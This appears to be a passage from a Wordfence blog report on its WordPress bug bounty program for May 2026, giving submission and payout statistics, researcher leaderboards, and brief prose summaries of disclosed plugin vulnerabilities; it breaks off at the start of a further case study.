<p>As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">most comprehensive and highest-quality</a> WordPress vulnerability program, the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Wordfence Bug Bounty Program</a> plays a critical role in helping site owners, developers, and hosting providers stay ahead of emerging threats at all stages of the open source lifecycle.</p>
<p>In this report, we highlight key metrics of the Bug Bounty Program from May 2026, recognize the researchers contributing to WordPress security, and provide insight into the vulnerabilities uncovered and addressed.</p>
<table role="table" aria-label="Data table">
<thead>
<tr>
<th scope="col">Table of Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#program-submission-highlights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"> Program Submission Highlights – May 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#submission-insights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vulnerability Submission Insights – May 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#bounty-insights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"> Bounty Insights – May 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#top-researchers" target="_blank" rel="noopener"> <img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f31f.png" alt="&#x1f31f;" class="wp-smiley"> Top WordPress Security Researchers – May 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#current-promotions" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4e3.png" alt="&#x1f4e3;" class="wp-smiley"> Current WordPress Bug Bounty Program Promotions</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#critical-highlights" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f526.png" alt="&#x1f526;" class="wp-smiley"> Critical WordPress Software Vulnerability Highlights – May 2026</a></td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/#conclusion" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4dd.png" alt="&#x1f4dd;" class="wp-smiley"> Conclusion</a></td>
</tr>
</tbody>
</table>
<p> </p>
<p>If you’re interested in joining the program or learning more about how we responsibly manage disclosures and protect WordPress users, visit the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a> page.</p>
</div>
<div>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vendors – Sign Up For Free Centralized Management of all Vulnerabilities in Your Software</strong></p>
<hr>
<p>Wordfence provides a completely free vulnerability management portal for WordPress Software vendors to easily track and manage all vulnerabilities submitted to the Wordfence Bug Bounty Program, and added to the Wordfence Intelligence Vulnerability Database.</p>
<p>This portal streamlines and enhances the repsonsible disclosure process so you can secure your customers faster.</p>
<div><a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Get Started With the Vendor Portal Today</a></div>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"> Program Submission Highlights – May 2026</h2>
<p>The Wordfence Bug Bounty Program is designed for momentum: rapid triage of critical issues, clear feedback, and fast, fair rewards. Each submission moves through our standardized workflow of validation, vendor coordination, patch verification, and firewall coverage where applicable, so research translates into real-world protection quickly.</p>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6e1.png" alt="&#x1f6e1;" class="wp-smiley"> Real-Time Protection Impact</strong></p>
<hr>
<p>Every vulnerability disclosed through this program is a threat <strong>you</strong> don’t have to face blindly. Our researchers uncover and report vulnerabilities <strong>before</strong> they can be exploited, and <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a> and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> users get protection in real-time through our firewall. Free users are protected in 30 days.</p>
</div>
<p>Behind the numbers is meaningful impact for site owners. The issues surfaced here inform new firewall rules, strengthen our detection logic, and help vendors ship safer releases. If you’re new to bounty hunting, this is a great place to start: we publish scope clearly, pay promptly, and credit the work that keeps WordPress secure.</p>
<div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4c8.png" alt="&#x1f4c8;" class="wp-smiley"></div>
<h3>Total Submissions</h3>
</div>
<div>1095</div>
<div><span>-15.0% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f465.png" alt="&#x1f465;" class="wp-smiley"></div>
<h3>Active Researchers</h3>
</div>
<div>293</div>
<div><span>-10.4% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"></div>
<h3>High Threat</h3>
</div>
<div>35</div>
<div><span>-32.7% from last month</span></div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="&#x26a0;" class="wp-smiley"></div>
<h3>Common &amp; Dangerous</h3>
</div>
<div>38</div>
<div><span>-25.5% from last month</span></div>
</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6e1.png" alt="&#x1f6e1;" class="wp-smiley"></div>
<h3>WAF Rules Released</h3>
</div>
<div>6</div>
<div><span>+100.0% from last month</span></div>
</div>
<p> </p>
<h4><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f3af.png" alt="&#x1f3af;" class="wp-smiley"> Vulnerability Focus Areas</h4>
<hr>
<ul>
<li><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> High Threat Vulnerabilities:</strong> Issues that could result in full site compromise, such as Arbitrary File Uploads or Remote Code Execution. Must be exploitable by unauthenticated or low-level authenticated attackers with software having 25+ active installations.</li>
<li><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="&#x26a0;" class="wp-smiley"> Common &amp; Dangerous:</strong> Stored Cross-Site Scripting and SQL Injection vulnerabilities exploitable by unauthenticated or low-level authenticated attackers. Software must have 500+ active installations.</li>
</ul>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"> Bounty Insights – May 2026</h2>
<p>Our research powers real investment back into the community. This section totals bounties and bonuses paid for the month and showcases standout findings. Our philosophy is simple: reward high-quality, responsibly disclosed research that measurably reduces risk for WordPress users.</p>
<div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4b0.png" alt="&#x1f4b0;" class="wp-smiley"></div>
<h3>Total Bounties Awarded</h3>
</div>
<div>$34,454</div>
<div>May 2026</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4ca.png" alt="&#x1f4ca;" class="wp-smiley"></div>
<h3>Average Bounty Per Submission</h3>
</div>
<div>$231.23</div>
<div>Per validated in-scope submission</div>
</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f3c6.png" alt="&#x1f3c6;" class="wp-smiley"></div>
<h3>Highest Single Bounty</h3>
</div>
<div>$6,436</div>
<div>Top researcher reward</div>
</div>
<hr>
<h3>Top 5 Bounties Awarded</h3>
<div>
<table role="table" aria-label="Top 5 Bounties Awarded">
<thead>
<tr>
<th scope="col">Vulnerability</th>
<th scope="col">Bounty</th>
<th scope="col">Install Count</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/3b5630bd-5bce-4226-959f-5e81ae69b799" target="_blank" rel="noopener">Kirki 6.0.0 – 6.0.6 – Unauthenticated Privilege Escalation via ‘handle_forgot_password’</a></td>
<td>$6,436.00</td>
<td>500,000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/e4bfb72e-023b-4bfd-b125-91f6ac2f200f" target="_blank" rel="noopener">Avada (Fusion) Builder &lt;= 3.15.3 – Unauthenticated Arbitrary File Deletion via Form Entry Value</a></td>
<td>$3,600.00</td>
<td>968,000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/0593c20d-3422-4817-9639-614254b609db" target="_blank" rel="noopener">AI Engine 3.4.9 – Authenticated (Subscriber+) Privilege Escalation via Missing Authorization in MCP OAuth Bearer Token</a></td>
<td>$1,931.00</td>
<td>100,000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/bd332f49-5aa9-4207-89db-84692a6430e0" target="_blank" rel="noopener">Advanced Custom Fields: Extended &lt;= 0.9.2.5 – Unauthenticated Privilege Escalation via Validation Bypass to ‘_acf_post_id’ Parameter</a></td>
<td>$1,127.00</td>
<td>100,000</td>
</tr>
<tr>
<td><a href="https://wordfence.com/threat-intel/vulnerabilities/id/8e7e7d78-de2f-4bdf-b04a-373463bd4d9c" target="_blank" rel="noopener">WPML Multilingual CMS &lt;= 4.9.5 – Incorrect Authorization to Authenticated (Subscriber+) SQL Injection via ‘elementIds’</a></td>
<td>$1,109.00</td>
<td>1,000,000</td>
</tr>
</tbody>
</table>
</div>
<p>Want to earn more? Read the scope carefully, target high-threat classes, and include clear reproduction steps with proof of impact. We pay promptly on validated issues, and bonus multipliers may apply during limited-time promotions and challenges.</p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> WordPress Software Vulnerability Submission Insights – May 2026</h2>
<p>This section breaks down how reports map to our program outcomes. What’s in scope, what isn’t, and where the highest security impact typically sits. We highlight the most common in-scope vulnerability classes and the categories that yielded the largest rewards so researchers can focus their efforts where they matter most.</p>
<p>Authentication level and exploit preconditions drive risk and reward through our program. Unauthenticated and low-privilege paths tend to have outsized impact because they scale to more real-world compromise. Use these insights to prioritize your testing strategy and maximize both security value and bounty potential.</p>
<hr>
<h3>Total Number of Vulnerabilities Considered In Scope, Out of Scope, Rejected, or Duplicate</h3>
<div>
<table role="table" aria-label="Submission Breakdown">
<thead>
<tr>
<th scope="col">In Scope</th>
<th scope="col">Out of Scope</th>
<th scope="col">Rejected</th>
<th scope="col">Duplicate</th>
</tr>
</thead>
<tbody>
<tr>
<td>149</td>
<td>86</td>
<td>526</td>
<td>334</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 10 Most Commonly Submitted In-Scope Vulnerability Types</h3>
<p>The most frequently submitted vulnerability types highlight current testing focus areas across the researcher community. These patterns often reflect both ease of discovery and prevalence in the WordPress ecosystem.</p>
<div>
<table role="table" aria-label="Top 10 Vulnerabilities by Submissions">
<thead>
<tr>
<th scope="col">Vulnerability Type</th>
<th scope="col">Total Submissions</th>
<th scope="col">Total Rewards</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</td>
<td>73</td>
<td>$6,612.00</td>
<td>$90.58</td>
</tr>
<tr>
<td>CWE 269: Improper Privilege Management</td>
<td>14</td>
<td>$13,187.00</td>
<td>$941.93</td>
</tr>
<tr>
<td>CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</td>
<td>14</td>
<td>$2,449.00</td>
<td>$174.93</td>
</tr>
<tr>
<td>CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)</td>
<td>9</td>
<td>$5,696.00</td>
<td>$632.89</td>
</tr>
<tr>
<td>CWE 862: Missing Authorization</td>
<td>8</td>
<td>$1,869.00</td>
<td>$233.63</td>
</tr>
<tr>
<td>CWE 434: Unrestricted Upload of File with Dangerous Type</td>
<td>6</td>
<td>$1,216.00</td>
<td>$202.67</td>
</tr>
<tr>
<td>CWE 94: Improper Control of Generation of Code (‘Code Injection’)</td>
<td>4</td>
<td>$598.00</td>
<td>$149.50</td>
</tr>
<tr>
<td>CWE 200: Exposure of Sensitive Information to an Unauthorized Actor</td>
<td>2</td>
<td>$320.00</td>
<td>$160.00</td>
</tr>
<tr>
<td>CWE 639: Authorization Bypass Through User-Controlled Key</td>
<td>2</td>
<td>$188.00</td>
<td>$94.00</td>
</tr>
<tr>
<td>CWE 640: Weak Password Recovery Mechanism for Forgotten Password</td>
<td>2</td>
<td>$957.00</td>
<td>$478.50</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h3>Top 10 Highest Rewarded In-Scope Vulnerability Types</h3>
<p>While some vulnerabilities appear frequently, others command premium rewards. This breakdown shows which vulnerability classes generated the highest total payouts across all submissions in those categories, indicating both severity and exploitability value.</p>
<div>
<table role="table" aria-label="Top 10 Vulnerabilities by Bounties">
<thead>
<tr>
<th scope="col">Vulnerability Type</th>
<th scope="col">Total Rewards</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>CWE 269: Improper Privilege Management</td>
<td>$13,187.00</td>
<td>14</td>
<td>$941.93</td>
</tr>
<tr>
<td>CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</td>
<td>$6,612.00</td>
<td>73</td>
<td>$90.58</td>
</tr>
<tr>
<td>CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)</td>
<td>$5,696.00</td>
<td>9</td>
<td>$632.89</td>
</tr>
<tr>
<td>CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</td>
<td>$2,449.00</td>
<td>14</td>
<td>$174.93</td>
</tr>
<tr>
<td>CWE 862: Missing Authorization</td>
<td>$1,869.00</td>
<td>8</td>
<td>$233.63</td>
</tr>
<tr>
<td>CWE 434: Unrestricted Upload of File with Dangerous Type</td>
<td>$1,216.00</td>
<td>6</td>
<td>$202.67</td>
</tr>
<tr>
<td>CWE 640: Weak Password Recovery Mechanism for Forgotten Password</td>
<td>$957.00</td>
<td>2</td>
<td>$478.50</td>
</tr>
<tr>
<td>CWE 94: Improper Control of Generation of Code (‘Code Injection’)</td>
<td>$598.00</td>
<td>4</td>
<td>$149.50</td>
</tr>
<tr>
<td>CWE 918: Server-Side Request Forgery (SSRF)</td>
<td>$502.00</td>
<td>2</td>
<td>$251.00</td>
</tr>
<tr>
<td>CWE 285: Improper Authorization</td>
<td>$325.00</td>
<td>1</td>
<td>$325.00</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>In-Scope Vulnerability Distribution by Authentication Level</h3>
<p>Authentication requirements directly impact real-world exploitability. Unauthenticated and subscriber-level vulnerabilities typically pose greater risk, reflected in both our prioritization and reward structure.</p>
<div>
<table role="table" aria-label="Vulnerability Distribution by Auth Level">
<thead>
<tr>
<th scope="col">Authentication Level</th>
<th scope="col">Total Vulnerabilities</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>Unauthenticated</td>
<td>53</td>
<td>$370.90</td>
</tr>
<tr>
<td>Contributor</td>
<td>43</td>
<td>$85.24</td>
</tr>
<tr>
<td>Subscriber</td>
<td>33</td>
<td>$304.44</td>
</tr>
<tr>
<td>Custom</td>
<td>9</td>
<td>$51.71</td>
</tr>
<tr>
<td>Unauthenticated – UI Required</td>
<td>5</td>
<td>$214.00</td>
</tr>
<tr>
<td>Author</td>
<td>4</td>
<td>$124.50</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h3>Vulnerability Submission Install Count Spread</h3>
<p>Install counts help us gauge <strong>blast radius</strong>. Higher install bases can move a finding into higher priority and often correlate with stronger payouts, while smaller-but-critical ecosystems still qualify when the exploitability and impact warrant it.</p>
<div>
<table role="table" aria-label="Vulnerability Install Count Spread">
<thead>
<tr>
<th scope="col">Install Range</th>
<th scope="col">Total Vulnerabilities</th>
<th scope="col">Average CVSS</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td>1,000–49,999</td>
<td>51</td>
<td>7.38</td>
<td>$107.34</td>
</tr>
<tr>
<td>100,000–999,999</td>
<td>44</td>
<td>6.85</td>
<td>$444.43</td>
</tr>
<tr>
<td>50,000–99,999</td>
<td>20</td>
<td>7.04</td>
<td>$180.35</td>
</tr>
<tr>
<td>Off-Repo</td>
<td>10</td>
<td>8.58</td>
<td>$290.25</td>
</tr>
<tr>
<td>1,000,000–4,999,999</td>
<td>10</td>
<td>6.76</td>
<td>$401.11</td>
</tr>
<tr>
<td>500–999</td>
<td>7</td>
<td>8.67</td>
<td>$71.43</td>
</tr>
<tr>
<td>5,000,000+</td>
<td>5</td>
<td>5.90</td>
<td>$129.60</td>
</tr>
<tr>
<td>0–499</td>
<td>2</td>
<td>8.15</td>
<td>$20.00</td>
</tr>
</tbody>
</table>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f31f.png" alt="&#x1f31f;" class="wp-smiley">Top WordPress Security Researchers – May 2026</h2>
<p>Security is a team sport, and this leaderboard celebrates the people raising the bar. We recognize contributors by valid in-scope submissions, overall earnings, and average severity to highlight different paths to excellence.</p>
<hr>
<h3>Top 5 Researchers based on Volume of In-Scope Submissions</h3>
<p>Volume leaders demonstrate consistent vulnerability discovery across diverse targets. These researchers excel at systematic testing and maintaining high validation rates.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by Submissions">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6038" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></td>
<td>11</td>
<td>$153.91</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5743" target="_blank" rel="noopener">h0xilo</a></td>
<td>6</td>
<td>$401.50</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5748" target="_blank" rel="noopener">daroo</a></td>
<td>6</td>
<td>$1,382.83</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/3781" target="_blank" rel="noopener">theviper17y</a></td>
<td>5</td>
<td>$55.20</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/4228" target="_blank" rel="noopener">thevietronin</a></td>
<td>5</td>
<td>$71.00</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 5 Researchers Based on Average CVSS of In-Scope Submissions</h3>
<p>Quality over quantity defines these researchers who consistently identify high-severity vulnerabilities. Their average CVSS scores reflect expertise in finding critical security gaps.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by CVSS">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Average CVSS</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/3443" target="_blank" rel="noopener">Foxyyy</a></td>
<td>9.80</td>
<td>1</td>
<td>$98.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/4529" target="_blank" rel="noopener">Alyudin Nafiie</a></td>
<td>9.80</td>
<td>1</td>
<td>$98.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6170" target="_blank" rel="noopener">CHOIGYEONGMIN</a></td>
<td>9.80</td>
<td>2</td>
<td>$3,380.50</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6176" target="_blank" rel="noopener">밥김국</a></td>
<td>9.80</td>
<td>1</td>
<td>$228.00</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6579" target="_blank" rel="noopener">t4g0</a></td>
<td>9.80</td>
<td>1</td>
<td>$163.00</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Top 5 Researchers Based On Total Bounties Earned</h3>
<p>Combining volume with severity, these top earners maximized their impact and rewards through strategic vulnerability research and comprehensive reporting.</p>
<div>
<table role="table" aria-label="Top 5 Researchers by Bounties">
<thead>
<tr>
<th scope="col">Researcher</th>
<th scope="col">Total Earned</th>
<th scope="col">Total Submissions</th>
<th scope="col">Avg. Reward</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5748" target="_blank" rel="noopener">daroo</a></td>
<td>$8,297.00</td>
<td>6</td>
<td>$1,382.83</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6170" target="_blank" rel="noopener">CHOIGYEONGMIN</a></td>
<td>$6,761.00</td>
<td>2</td>
<td>$3,380.50</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/5743" target="_blank" rel="noopener">h0xilo</a></td>
<td>$2,409.00</td>
<td>6</td>
<td>$401.50</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6038" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></td>
<td>$1,693.00</td>
<td>11</td>
<td>$153.91</td>
</tr>
<tr>
<td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6487" target="_blank" rel="noopener">lhking</a></td>
<td>$1,503.00</td>
<td>2</td>
<td>$751.50</td>
</tr>
</tbody>
</table>
</div>
<hr>
<h3>Researchers Promoted to the Next Tier</h3>
<p>Congratulations to the following researchers who have unlocked the next tier! Tier promotions reflect sustained performance, precision, and professionalism in disclosure. Advancing unlocks higher caps, faster reviews, and more visibility. If you’re climbing the ranks, focus on high risk vulnerabilities, keep reports crisp, attach working PoCs, and include mitigation notes vendors can ship quickly.</p>
<div>
<div>
<div>
<h4>Elite Researcher Tier (1337)</h4>
<div>0 researchers advanced to elite status</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f622.png" alt="&#x1f622;" class="wp-smiley"></div>
<div>No Elite Researcher Promotions</div>
<div>No researchers advanced to elite (1337) status this month</div>
</div>
</div>
</div>
<div>
<div>
<h4>Resourceful Researcher Tier</h4>
<div>0 researchers advanced to resourceful status</div>
</div>
<div>
<div>
<div><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f622.png" alt="&#x1f622;" class="wp-smiley"></div>
<div>No Resourceful Researcher Promotions</div>
<div>No researchers advanced to resourceful status this month</div>
</div>
</div>
</div>
</div>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4e3.png" alt="&#x1f4e3;" class="wp-smiley"> Current WordPress Bug Bounty Program Promotions</h2>
<p>As part of our Bug Bounty Program, we regularly launch special promotions that boost bounty rewards and expand research scope. These initiatives are designed to reinforce our mission: delivering the highest quality vulnerability intelligence while encouraging researchers to focus on the discoveries that have the greatest positive impact on the WordPress ecosystem.</p>
<p>At the same time, we also look for promotions that give researchers opportunities to sharpen their skills, take on new challenges, and continue growing into the best of the best in WordPress security research. We often supplement these with educational material for researchers to learn and apply their skills during these promotions.</p>
<p>Below, you’ll find details on all currently active challenges—including timelines and a quick overview of each promotion.</p>
<div><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="&#x274c;" class="wp-smiley"> No promotions currently running.</strong></div>
<p>New to promotions? Start by confirming the software and version range are in scope, validate exploitability on a clean test environment, and submit with clear steps, affected code paths, and impact. Promotions are perfect opportunities for both new and seasoned researchers to maximize earnings while driving faster patch adoption. And remember, you can always check what’s in-scope and out-of-scope by using the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/#rewards" target="_blank" rel="noopener">Wordfence bounty estimator</a>.</p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f526.png" alt="&#x1f526;" class="wp-smiley"> Critical WordPress Software Vulnerability Highlights – May 2026</h2>
<p>These case studies spotlight high-impact vulnerabilities uncovered through the program, why they matter, and how quickly protection rolled out. We share technical detail to help researchers learn, vendors harden code, and users understand why timely updates aren’t optional.</p>
<p>If you maintain a site, update to the patched versions listed and ensure Wordfence is active so you benefit from new firewall coverage as it ships. If you’re a researcher, use these write-ups to inform your hunt: patterns repeat, and past root causes often reappear in adjacent code.</p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 1,000,000 WordPress Sites Affected by Arbitrary File Read and SQL Injection Vulnerabilities in Avada Builder WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/1000000-wordpress-sites-affected-by-arbitrary-file-read-and-sql-injection-vulnerabilities-in-avada-builder-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/05/FeaturedImage_Wordfence_311.03.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Avada Builder &lt;= 3.15.2 – Authenticated (Subscriber+) Arbitrary File Read via ‘custom_svg’ Shortcode Parameter</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$3,386.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Avada Builder plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.15.2 via the ‘fusion_get_svg_from_file’ function with the ‘custom_svg’ parameter of the ‘fusion_section_separator’ shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability was partially patched in version 3.15.2 and fully patched in version 3.15.3.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/1000000-wordpress-sites-affected-by-arbitrary-file-read-and-sql-injection-vulnerabilities-in-avada-builder-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 200,000 WordPress Sites at Risk from Critical Authentication Bypass Vulnerability in Burst Statistics Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/05/FeaturedImage_Wordfence_322.04.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Burst Statistics 3.4.0 – 3.4.1.1 – Authentication Bypass to Admin Account Takeover</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>N/A</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) plugin for WordPress is vulnerable to Authentication Bypass in versions 3.4.0 to 3.4.1.1. This is due to incorrect return-value handling in the `is_mainwp_authenticated()` function when validating application passwords from the Authorization header. This makes it possible for unauthenticated attackers, with knowledge of an administrator username, to impersonate that administrator for the duration of the request by supplying any random Basic Authentication password achieving privilege escalation.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> Attackers Actively Exploiting Critical Vulnerability in Breeze Cache Plugin</h3>
</div>
